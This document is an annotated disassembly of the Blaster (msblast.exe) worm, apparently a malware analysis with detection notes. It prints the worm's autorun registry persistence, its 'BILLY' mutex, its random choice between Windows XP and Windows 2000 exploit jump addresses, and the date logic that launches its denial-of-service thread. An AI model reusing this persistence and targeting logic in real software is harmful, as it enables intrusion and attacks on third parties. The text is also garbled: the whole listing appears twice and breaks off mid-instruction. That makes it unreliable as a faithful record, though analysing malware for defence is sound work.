tombkeeper#whitecell.org
; Persistence: write an autorun value under the HKLM ...\CurrentVersion\Run key, then create a named mutex.
; Function entry at 00401250. The Win32 APIs below are stdcall: arguments are pushed right-to-left,
; so the last push before each Call is the first parameter. The function continues past this excerpt.
:00401250 55 push ebp
:00401251 89E5 mov ebp, esp
:00401253 81ECAC030000 sub esp, 000003AC ;0x3AC = 940 bytes of locals
:00401259 56 push esi
:0040125A 57 push edi
:0040125B 31F6 xor esi, esi ;esi = 0 (its use is outside this excerpt)
:0040125D 6A00 push 00000000 ;lpdwDisposition = NULL
:0040125F 8D45F8 lea eax, dword ptr [ebp-08]
:00401262 50 push eax ;phkResult = &hKey, local at [ebp-08]
:00401263 6A00 push 00000000 ;lpSecurityAttributes = NULL
:00401265 683F000F00 push 000F003F ;samDesired = 0x000F003F = KEY_ALL_ACCESS
:0040126A 6A00 push 00000000 ;dwOptions = 0
:0040126C 6A00 push 00000000 ;lpClass = NULL
:0040126E 6A00 push 00000000 ;Reserved = 0
:00401270 685D484000 push 0040485D ;db 'SOFTWARE/Microsoft/Windows/CurrentVersion/Run',0  lpSubKey. NOTE(review): the separators appear as '/' in this listing; the registry API treats only '\' as a path separator, so this is probably a transcription artifact - confirm against the bytes at 0040485D
:00401275 6802000080 push 80000002 ;hKey = 0x80000002 = HKEY_LOCAL_MACHINE
:0040127A E80D110000 Call 0040238C ;ADVAPI32.RegCreateKeyExA  (the return value is not tested before the handle in [ebp-08] is used)
:0040127F 6A32 push 00000032 ;cbData = 0x32 = 50 bytes
:00401281 683C404000 push 0040403C ;db 'msblast.exe',0  lpData. The string is 12 bytes incl. the NUL but cbData is 50, so 38 bytes following the string are copied into the value data as well - an artifact visible in the stored value
:00401286 6A01 push 00000001 ;dwType = 1 = REG_SZ
:00401288 6A00 push 00000000 ;Reserved = 0
:0040128A 6849484000 push 00404849 ;db 'windows auto update',0  lpValueName
:0040128F FF75F8 push [ebp-08] ;hKey returned by RegCreateKeyExA
:00401292 E801110000 Call 00402398 ;ADVAPI32.RegSetValueExA
:00401297 FF75F8 push [ebp-08]
:0040129A E8E1100000 Call 00402380 ;ADVAPI32.RegCloseKey
; Detection: a Run value named 'windows auto update' whose data begins with 'msblast.exe'.
; Create a named mutex
:0040129F 6843484000 push 00404843 ;db 'BILLY',0  lpName
:004012A4 6A01 push 00000001 ;bInitialOwner = TRUE
:004012A6 6A00 push 00000000 ;lpMutexAttributes = NULL
:004012A8 E8A3100000 Call 00402350 ;KERNEL32.CreateMutexA  (presumably a single-instance guard; how the result is handled is outside this excerpt. The mutex name 'BILLY' is a host-based indicator)
……………………
; Random choices that steer the data sent later.
; CRTDLL functions are cdecl: the caller removes the argument, hence the 'pop ecx' after each call.
:00401476 E8BD0E0000 Call 00402338 ;KERNEL32.GetTickCount
:0040147B 50 push eax ;seed = GetTickCount() (the tick count is used as the srand seed)
:0040147C E8B30F0000 Call 00402434 ;CRTDLL.srand
:00401481 59 pop ecx ;cdecl cleanup of the one argument
:00401482 E8890F0000 Call 00402410 ;CRTDLL.rand
:00401487 B914000000 mov ecx, 00000014 ;divisor = 20
:0040148C 99 cdq ;sign-extend eax into edx:eax for idiv
:0040148D F7F9 idiv ecx ;edx = rand() % 20
:0040148F 83FA0C cmp edx, 0000000C
:00401492 7D02 jge 00401496 ;if (rand() % 20 >= 12) leave esi unchanged
:00401494 31F6 xor esi, esi ;else esi = 0 (taken 12/20 = 60% of the time; esi's meaning is not visible in this excerpt)
:00401496 C7053431400001000000 mov dword ptr [00403134], 00000001 ;target-OS selector = 1 (default; read at 00401954, where 1 selects the Windows XP constant)
:004014A0 E86B0F0000 Call 00402410 ;CRTDLL.rand
:004014A5 B90A000000 mov ecx, 0000000A ;divisor = 10
:004014AA 99 cdq
:004014AB F7F9 idiv ecx ;edx = rand() % 10
:004014AD 83FA07 cmp edx, 00000007
:004014B0 7E0A jle 004014BC ;if (rand() % 10 <= 7) keep selector = 1
:004014B2 C7053431400002000000 mov dword ptr [00403134], 00000002 ;else selector = 2 (2/10 = 20% of the time; at 00401954 this selects the Windows 2000 constant)
……………………
; Choose the per-OS constant according to the selector written at 00401496 / 004014B2.
; The enclosing function's prologue is outside this excerpt; FFFFEAEC = -0x1514, a local at [ebp-1514h].
:00401954 833D3431400001 cmp dword ptr [00403134], 00000001 ;selector == 1 ? (this compare decides whether the attack code sent targets Windows 2000 or Windows XP)
:0040195B 750C jne 00401969
:0040195D C785ECEAFFFF9D130001 mov dword ptr [ebp+FFFFEAEC], 0100139D ;selector == 1: use the jump address for Windows XP
:00401967 EB0A jmp 00401973
:00401969 C785ECEAFFFF9F751800 mov dword ptr [ebp+FFFFEAEC], 0018759F ;any other value: use the jump address for Windows 2000
……………………
; Date check: decide whether to start the DoS thread.
; GetDateFormatA(Locale, dwFlags, lpDate, lpFormat, lpDateStr, cchDate); lpDate = NULL formats the current local date.
:004014FC 6A03 push 00000003 ;cchDate = 3 (size of buffer)
:004014FE 8D45F4 lea eax, dword ptr [ebp-0C]
:00401501 50 push eax ;lpDateStr = buffer at [ebp-0C]
:00401502 683C484000 push 0040483C ;db 'd',0  lpFormat: day of month without leading zero (get the day)
:00401507 6A00 push 00000000 ;lpDate = NULL -> current date
:00401509 6A00 push 00000000 ;dwFlags = 0
:0040150B 6809040000 push 00000409 ;Locale = 0x0409 ("0409" = en-us; English (United States))
; Author's note: judging from the Locale argument to GetDateFormatA, the author's own operating system used the US regional setting.
; NOTE(review): the LCID is a hard-coded constant, so the 'd'/'M' output does not depend on the victim host's locale; it is only weak evidence about the author's own configuration.
:00401510 E8E70D0000 Call 004022FC ;KERNEL32.GetDateFormatA
:00401515 6A03 push 00000003 ;cchDate = 3
:00401517 8D45F0 lea eax, dword ptr [ebp-10]
:0040151A 50 push eax ;lpDateStr = buffer at [ebp-10]
:0040151B 683A484000 push 0040483A ;db 'M',0  lpFormat: month without leading zero (get the month)
:00401520 6A00 push 00000000 ;lpDate = NULL -> current date
:00401522 6A00 push 00000000 ;dwFlags = 0
:00401524 6809040000 push 00000409 ;Locale = en-us
:00401529 E8CE0D0000 Call 004022FC ;KERNEL32.GetDateFormatA
:0040152E 8D45F4 lea eax, dword ptr [ebp-0C]
:00401531 50 push eax
:00401532 E8790E0000 Call 004023B0 ;CRTDLL.atoi -> eax = day of month
:00401537 59 pop ecx ;cdecl cleanup
:00401538 83F80F cmp eax, 0000000F ;day > 15 ?
:0040153B 7F0F jg 0040154C ;day > 15: jump straight to creating the DoS thread
:0040153D 8D7DF0 lea edi, dword ptr [ebp-10]
:00401540 57 push edi
:00401541 E86A0E0000 Call 004023B0 ;CRTDLL.atoi -> eax = month
:00401546 59 pop ecx ;cdecl cleanup
:00401547 83F808 cmp eax, 00000008 ;month > 8 ?
:0040154A 7E16 jle 00401562 ;month <= 8: skip thread creation; month > 8 falls through and creates the DoS thread
; Net trigger: day 16..31 of any month, or any day from September through December. No year is consulted, so the condition recurs every year.
:0040154C 8D45FC lea eax, dword ptr [ebp-04]
:0040154F 50 push eax ;lpThreadId = &[ebp-04]
:00401550 6A00 push 00000000 ;dwCreationFlags = 0 (thread runs immediately)
:00401552 6A00 push 00000000 ;lpParameter = NULL
:00401554 68C11E4000 push 00401EC1 ;lpStartAddress = DoS routine
:00401559 6A00 push 00000000 ;dwStackSize = 0 (default)
:0040155B 6A00 push 00000000 ;lpThreadAttributes = NULL
:0040155D E8120E0000 Call 00402374 ;KERNEL32.CreateThread
……………………
;处理地址子函数,转换结果保存在eax
:00401E8B 55 push ebp
:00401E8C 89E5 mov ebp, esp
:00401E8E 56 push esi
:00401E8F 5
; Persistence: write an autorun value under the HKLM ...\CurrentVersion\Run key, then create a named mutex.
; Function entry at 00401250. The Win32 APIs below are stdcall: arguments are pushed right-to-left,
; so the last push before each Call is the first parameter. The function continues past this excerpt.
:00401250 55 push ebp
:00401251 89E5 mov ebp, esp
:00401253 81ECAC030000 sub esp, 000003AC ;0x3AC = 940 bytes of locals
:00401259 56 push esi
:0040125A 57 push edi
:0040125B 31F6 xor esi, esi ;esi = 0 (its use is outside this excerpt)
:0040125D 6A00 push 00000000 ;lpdwDisposition = NULL
:0040125F 8D45F8 lea eax, dword ptr [ebp-08]
:00401262 50 push eax ;phkResult = &hKey, local at [ebp-08]
:00401263 6A00 push 00000000 ;lpSecurityAttributes = NULL
:00401265 683F000F00 push 000F003F ;samDesired = 0x000F003F = KEY_ALL_ACCESS
:0040126A 6A00 push 00000000 ;dwOptions = 0
:0040126C 6A00 push 00000000 ;lpClass = NULL
:0040126E 6A00 push 00000000 ;Reserved = 0
:00401270 685D484000 push 0040485D ;db 'SOFTWARE/Microsoft/Windows/CurrentVersion/Run',0  lpSubKey. NOTE(review): the separators appear as '/' in this listing; the registry API treats only '\' as a path separator, so this is probably a transcription artifact - confirm against the bytes at 0040485D
:00401275 6802000080 push 80000002 ;hKey = 0x80000002 = HKEY_LOCAL_MACHINE
:0040127A E80D110000 Call 0040238C ;ADVAPI32.RegCreateKeyExA  (the return value is not tested before the handle in [ebp-08] is used)
:0040127F 6A32 push 00000032 ;cbData = 0x32 = 50 bytes
:00401281 683C404000 push 0040403C ;db 'msblast.exe',0  lpData. The string is 12 bytes incl. the NUL but cbData is 50, so 38 bytes following the string are copied into the value data as well - an artifact visible in the stored value
:00401286 6A01 push 00000001 ;dwType = 1 = REG_SZ
:00401288 6A00 push 00000000 ;Reserved = 0
:0040128A 6849484000 push 00404849 ;db 'windows auto update',0  lpValueName
:0040128F FF75F8 push [ebp-08] ;hKey returned by RegCreateKeyExA
:00401292 E801110000 Call 00402398 ;ADVAPI32.RegSetValueExA
:00401297 FF75F8 push [ebp-08]
:0040129A E8E1100000 Call 00402380 ;ADVAPI32.RegCloseKey
; Detection: a Run value named 'windows auto update' whose data begins with 'msblast.exe'.
; Create a named mutex
:0040129F 6843484000 push 00404843 ;db 'BILLY',0  lpName
:004012A4 6A01 push 00000001 ;bInitialOwner = TRUE
:004012A6 6A00 push 00000000 ;lpMutexAttributes = NULL
:004012A8 E8A3100000 Call 00402350 ;KERNEL32.CreateMutexA  (presumably a single-instance guard; how the result is handled is outside this excerpt. The mutex name 'BILLY' is a host-based indicator)
……………………
; Random choices that steer the data sent later.
; CRTDLL functions are cdecl: the caller removes the argument, hence the 'pop ecx' after each call.
:00401476 E8BD0E0000 Call 00402338 ;KERNEL32.GetTickCount
:0040147B 50 push eax ;seed = GetTickCount() (the tick count is used as the srand seed)
:0040147C E8B30F0000 Call 00402434 ;CRTDLL.srand
:00401481 59 pop ecx ;cdecl cleanup of the one argument
:00401482 E8890F0000 Call 00402410 ;CRTDLL.rand
:00401487 B914000000 mov ecx, 00000014 ;divisor = 20
:0040148C 99 cdq ;sign-extend eax into edx:eax for idiv
:0040148D F7F9 idiv ecx ;edx = rand() % 20
:0040148F 83FA0C cmp edx, 0000000C
:00401492 7D02 jge 00401496 ;if (rand() % 20 >= 12) leave esi unchanged
:00401494 31F6 xor esi, esi ;else esi = 0 (taken 12/20 = 60% of the time; esi's meaning is not visible in this excerpt)
:00401496 C7053431400001000000 mov dword ptr [00403134], 00000001 ;target-OS selector = 1 (default; read at 00401954, where 1 selects the Windows XP constant)
:004014A0 E86B0F0000 Call 00402410 ;CRTDLL.rand
:004014A5 B90A000000 mov ecx, 0000000A ;divisor = 10
:004014AA 99 cdq
:004014AB F7F9 idiv ecx ;edx = rand() % 10
:004014AD 83FA07 cmp edx, 00000007
:004014B0 7E0A jle 004014BC ;if (rand() % 10 <= 7) keep selector = 1
:004014B2 C7053431400002000000 mov dword ptr [00403134], 00000002 ;else selector = 2 (2/10 = 20% of the time; at 00401954 this selects the Windows 2000 constant)
……………………
; Choose the per-OS constant according to the selector written at 00401496 / 004014B2.
; The enclosing function's prologue is outside this excerpt; FFFFEAEC = -0x1514, a local at [ebp-1514h].
:00401954 833D3431400001 cmp dword ptr [00403134], 00000001 ;selector == 1 ? (this compare decides whether the attack code sent targets Windows 2000 or Windows XP)
:0040195B 750C jne 00401969
:0040195D C785ECEAFFFF9D130001 mov dword ptr [ebp+FFFFEAEC], 0100139D ;selector == 1: use the jump address for Windows XP
:00401967 EB0A jmp 00401973
:00401969 C785ECEAFFFF9F751800 mov dword ptr [ebp+FFFFEAEC], 0018759F ;any other value: use the jump address for Windows 2000
……………………
; Date check: decide whether to start the DoS thread.
; GetDateFormatA(Locale, dwFlags, lpDate, lpFormat, lpDateStr, cchDate); lpDate = NULL formats the current local date.
:004014FC 6A03 push 00000003 ;cchDate = 3 (size of buffer)
:004014FE 8D45F4 lea eax, dword ptr [ebp-0C]
:00401501 50 push eax ;lpDateStr = buffer at [ebp-0C]
:00401502 683C484000 push 0040483C ;db 'd',0  lpFormat: day of month without leading zero (get the day)
:00401507 6A00 push 00000000 ;lpDate = NULL -> current date
:00401509 6A00 push 00000000 ;dwFlags = 0
:0040150B 6809040000 push 00000409 ;Locale = 0x0409 ("0409" = en-us; English (United States))
; Author's note: judging from the Locale argument to GetDateFormatA, the author's own operating system used the US regional setting.
; NOTE(review): the LCID is a hard-coded constant, so the 'd'/'M' output does not depend on the victim host's locale; it is only weak evidence about the author's own configuration.
:00401510 E8E70D0000 Call 004022FC ;KERNEL32.GetDateFormatA
:00401515 6A03 push 00000003 ;cchDate = 3
:00401517 8D45F0 lea eax, dword ptr [ebp-10]
:0040151A 50 push eax ;lpDateStr = buffer at [ebp-10]
:0040151B 683A484000 push 0040483A ;db 'M',0  lpFormat: month without leading zero (get the month)
:00401520 6A00 push 00000000 ;lpDate = NULL -> current date
:00401522 6A00 push 00000000 ;dwFlags = 0
:00401524 6809040000 push 00000409 ;Locale = en-us
:00401529 E8CE0D0000 Call 004022FC ;KERNEL32.GetDateFormatA
:0040152E 8D45F4 lea eax, dword ptr [ebp-0C]
:00401531 50 push eax
:00401532 E8790E0000 Call 004023B0 ;CRTDLL.atoi -> eax = day of month
:00401537 59 pop ecx ;cdecl cleanup
:00401538 83F80F cmp eax, 0000000F ;day > 15 ?
:0040153B 7F0F jg 0040154C ;day > 15: jump straight to creating the DoS thread
:0040153D 8D7DF0 lea edi, dword ptr [ebp-10]
:00401540 57 push edi
:00401541 E86A0E0000 Call 004023B0 ;CRTDLL.atoi -> eax = month
:00401546 59 pop ecx ;cdecl cleanup
:00401547 83F808 cmp eax, 00000008 ;month > 8 ?
:0040154A 7E16 jle 00401562 ;month <= 8: skip thread creation; month > 8 falls through and creates the DoS thread
; Net trigger: day 16..31 of any month, or any day from September through December. No year is consulted, so the condition recurs every year.
:0040154C 8D45FC lea eax, dword ptr [ebp-04]
:0040154F 50 push eax ;lpThreadId = &[ebp-04]
:00401550 6A00 push 00000000 ;dwCreationFlags = 0 (thread runs immediately)
:00401552 6A00 push 00000000 ;lpParameter = NULL
:00401554 68C11E4000 push 00401EC1 ;lpStartAddress = DoS routine
:00401559 6A00 push 00000000 ;dwStackSize = 0 (default)
:0040155B 6A00 push 00000000 ;lpThreadAttributes = NULL
:0040155D E8120E0000 Call 00402374 ;KERNEL32.CreateThread
……………………
;处理地址子函数,转换结果保存在eax
:00401E8B 55 push ebp
:00401E8C 89E5 mov ebp, esp
:00401E8E 56 push esi
:00401E8F 5